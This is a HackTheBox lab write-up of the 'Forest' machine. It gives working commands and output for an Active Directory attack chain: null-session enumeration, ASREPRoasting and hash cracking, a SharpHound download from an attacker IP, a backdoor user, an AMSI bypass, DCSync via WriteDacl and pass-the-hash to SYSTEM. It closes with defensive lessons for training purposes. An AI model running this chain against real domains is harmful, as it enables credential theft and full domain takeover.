📋 This writeup is part of the Lainkusanagi OSCP Like List — a curated collection of machines recommended for OSCP preparation.
TL;DR
Forest is an Easy Windows Domain Controller running Exchange Server. Anonymous LDAP/null-session enumeration exposes the full domain user list, including a service account with Kerberos pre-authentication disabled. ASREPRoasting yields a crackable hash for svc-alfresco. That account sits inside the Account Operators group — which grants the ability to create new users and add them to most groups, including Exchange Windows Permissions. That group holds WriteDacl on the domain object, enabling a DCSync attack that dumps all NTLM hashes and delivers a SYSTEM shell via Pass-the-Hash.
Tools used: Nmap · enum4linux · Impacket (GetNPUsers, secretsdump, psexec) · Hashcat · Evil-WinRM · SharpHound · BloodHound · PowerView (Add-ObjectACL)
Introduction
Forest is a retired Easy-difficulty Windows machine on HackTheBox running a Domain Controller with Exchange Server installed. It demonstrates a well-known attack path that exploits the excessive privileges Exchange grants its service groups by default — a misconfiguration that existed in production environments for years and remains relevant in legacy AD deployments. The path from anonymous enumeration to full domain compromise is clean, logical, and deeply educational.
Machine: Forest OS: Windows Server 2016 Difficulty: Easy Domain: htb.local IP: 10.129.95.210
Enumeration
Port Scanning
nmap -sCV --min-rate=5000 -p- -oN initialscan.txt -vv 10.129.95.210
Standard DC port profile — Kerberos, LDAP, SMB, WinRM all open. Nmap’s SMB scripts immediately identify the target:
Computer name: FOREST
Domain name: htb.local
FQDN: FOREST.htb.local
OS: Windows Server 2016 Standard 14393
Port 5985 (WinRM) being open is significant — any valid credential we find will likely give us a remote shell.
Null Session Enumeration with enum4linux
Forest allows anonymous (null) session binds to LDAP and SMB, which is an immediate red flag. Running enum4linux without credentials:
enum4linux -a 10.129.95.210 | tee enum4linux.txt
The output is verbose and rich. Key findings:
Full domain user list leaked anonymously:
Administrator, Guest, krbtgt, DefaultAccount
sebastien, lucinda, svc-alfresco, andy, mark, santi
Plus a large number of Exchange health mailbox and system accounts (SM_*, HealthMailbox*).
Group membership reveals the Exchange setup:
Exchange Trusted Subsystem → member of Exchange Windows Permissions
Service Accounts → member of Privileged IT Accounts
svc-alfresco → member of Service Accounts
The Exchange Windows Permissions group is a well-known privilege escalation vector in domains with Exchange installed — it holds WriteDacl on the domain object by default, which can be abused to grant DCSync rights.
Initial Foothold
ASREPRoasting — svc-alfresco
With the user list in hand, testing for Kerberos pre-authentication disabled using impacket-GetNPUsers:
impacket-GetNPUsers HTB/ -usersfile user.txt -no-pass -dc-ip 10.129.95.210
Only one account returns a hash:
$krb5asrep$23$svc-alfresco@HTB:[AS-REP HASH]
svc-alfresco has pre-authentication disabled, handing over an AS-REP hash without any credentials required.
Cracking the Hash
hashcat -m 18200 svc.hash /usr/share/wordlists/rockyou.txt
[AS-REP HASH]:[PASSWORD]
Status: Cracked
Credentials: svc-alfresco:[PASSWORD]
Shell via Evil-WinRM
Port 5985 is open. With valid credentials, logging in is straightforward:
evil-winrm -i 10.129.95.210 -u svc-alfresco -p '[PASSWORD]'
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
User Flag
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> type C:\Users\svc-alfresco\Desktop\user.txt
[USER FLAG]
Privilege Escalation
BloodHound — Mapping the Path to Domain Admin
Uploading SharpHound to collect AD data from inside the WinRM session:
# Download SharpHound from attacker machine
iwr -uri http://10.10.14.32/SharpHound.ps1 -outfile sharp.ps1
Import-Module ./sharp.ps1
Invoke-Bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass '[PASSWORD]'
# Download the zip back to Kali
download 20240409092833_BloodHound.zip
Loading the data into BloodHound surfaces the attack path:
svc-alfresco → member of Service Accounts → member of Privileged IT Accounts → member of Account Operators
Account Operators is a built-in privileged group that allows its members to create domain user accounts and add users to most groups — crucially including Exchange Windows Permissions.
Exchange Windows Permissions holds WriteDacl on the domain object (htb.local), meaning any member can modify the domain's DACL — including granting themselves DCSync rights.
Abusing Account Operators — Creating a Backdoor User
Since svc-alfresco is effectively an Account Operators member, a new user can be created and immediately added to the Exchange Windows Permissions group:
$pass = ConvertTo-SecureString "[PASSWORD]" -AsPlainText -Force
New-ADUser hack -AccountPassword $pass -Enabled $True
Add-ADGroupMember -Identity "Exchange Windows Permissions" -members hack
Confirming group membership:
net group "Exchange Windows Permissions"
# Members: hack ✓
Granting DCSync Rights via WriteDacl
Using PowerView’s Add-ObjectACL to write DS-Replication-Get-Changes-All (DCSync) rights for the hack account onto the domain object. First bypassing AMSI:
Bypass-4MSI
$cred = New-Object System.Management.Automation.PSCredential('htb\hack', $pass)
Add-ObjectACL -PrincipalIdentity hack -Credential $cred -Rights DCSynchack now has the ability to replicate domain credentials — effectively DCSync rights.
DCSync — Dumping All Domain Hashes
From Kali, using impacket-secretsdump as the hack account:
impacket-secretsdump htb.local/hack@10.129.212.119 -just-dc
Password: [PASSWORD]
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:[NTLM HASH]
htb.local\svc-alfresco:1147:[NTLM HASH]
htb.local\sebastien:1145:[NTLM HASH]
htb.local\lucinda:1146:[NTLM HASH]
[... all domain hashes ...]
The Administrator’s NTLM hash is in hand.
Pass-the-Hash — SYSTEM Shell
impacket-psexec Administrator@10.129.212.119 -hashes [NTLM HASH]
C:\Windows\system32> whoami
nt authority\system
Root Flag
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
[ROOT FLAG]
Key Takeaways
1. Null session enumeration is a critical misconfiguration. The entire attack chain started with an unauthenticated user listing the full domain user base. LDAP anonymous bind and null SMB sessions should be disabled in any production AD environment. If an attacker can enumerate users without credentials, they can start attacking accounts immediately.
2. ASREPRoastable accounts are low-hanging fruit. Any account with Kerberos pre-authentication disabled hands over an offline-crackable hash to anyone who asks — no credentials required. This setting should be audited regularly. If a legacy application genuinely requires it, the account’s password must be extremely long and complex.
3. Exchange’s default permissions are dangerous. The Exchange Windows Permissions group holding WriteDacl on the domain object is a design decision Microsoft has since addressed, but countless environments still have it. Any Exchange deployment should be assessed for this path, and the group's domain-level rights should be explicitly audited and minimised.
4. Account Operators is a stealthy privilege escalation vector. This group is often overlooked because it doesn’t have obvious domain admin powers — but the ability to create users and add them to most groups is effectively the same thing when Exchange groups are involved. Membership in Account Operators should be treated as highly privileged.
5. DCSync requires no malware on the DC. The attack is carried out entirely remotely via legitimate Kerberos replication protocols. There’s no binary to detect on the DC, no lateral movement event — just a replication request that looks like normal DC behaviour. Detecting DCSync requires monitoring for DS-Replication-Get-Changes-All permissions being granted to non-DC accounts, and alerting on replication requests from non-DC machines.
Thanks for reading! Follow for more HackTheBox writeups covering Active Directory and Windows exploitation techniques.
HackTheBox — Forest (Easy Windows / Active Directory) was originally published in System Weakness on Medium, where people are continuing the conversation by highlighting and responding to this story.